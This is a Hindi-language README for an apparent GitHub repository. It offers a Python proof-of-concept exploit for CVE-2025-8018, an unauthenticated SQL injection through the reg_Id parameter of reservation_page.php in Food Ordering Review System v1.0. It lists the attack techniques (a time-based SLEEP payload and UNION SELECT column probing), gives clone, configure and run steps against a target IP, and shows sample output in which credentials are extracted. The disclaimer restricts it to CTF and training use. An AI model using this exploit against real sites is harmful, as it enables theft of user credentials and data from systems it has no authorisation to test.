
CVE-2025-8018 के लिए Python PoC एक्सप्लॉइट, Food Ordering Review System v1.0 में महत्वपूर्ण अनप्रमाणित SQL इंजेक्शन। नैतिक हैकिंग और CTF प्रशिक्षण के लिए समय-आधारित ब्लाइंड और UNION-आधारित डेटा निष्कर्षण का समर्थन करता है।
यह रिपॉजिटरी CVE‑2025‑8018 के लिए एक Python प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट प्रदान करती है, जो Food Ordering Review System v1.0 में पाई गई एक उच्च-गंभीरता वाली SQL इंजेक्शन कमजोरी है। यह कमजोरी reservation_page.php में reg_Id पैरामीटर के माध्यम से ट्रिगर होती है।
/user/reservation_page.phpreg_Idusers तालिका से डेटा निकालना शामिल हैSLEEP() का उपयोग करकेUNION SELECT NULL,NULL,... का उपयोग करकेrequests लाइब्रेरीनिर्भरताएँ स्थापित करें:
pip install requests
How to Use रिपॉजिटरी को क्लोन करें:
git clone https://github.com/drackyjr/CVE-2025-8018.git
cd CVE-2025-8018
लक्ष्य URL अपडेट करें:
cve-2025-8018.py खोलें और इसे संशोधित करें:
TARGET_URL = "http://TARGET-IP/user/reservation_page.php"
TARGET-IP को कमजोर सिस्टम के वास्तविक पते से बदलें।
एक्सप्लॉइट स्क्रिप्ट चलाएँ:
python3 cve-2025-8018.py
Output
[*] Checking time-based SQLi with payload: 1 AND SLEEP(5)--
[+] Blind SQL injection confirmed!
[*] Testing how many columns the query expects...
[+] Looks like 3 columns work!
[*] Trying to extract data using UNION-based SQL injection...
[+] Found potential credentials in the response!
[*] Trying blind extraction fallback...
[+] Username is 7 characters long!
⚠️ Disclaimer यह PoC केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है, जैसे CTF चुनौतियाँ, साइबर सुरक्षा प्रशिक्षण, या अपने स्वयं के सिस्टम पर रक्षात्मक परीक्षण।
इसका उपयोग किसी भी उत्पादन सिस्टम या उन सिस्टमों के विरुद्ध न करें जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। लेखक और कोई भी संबद्ध पक्ष कोड के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।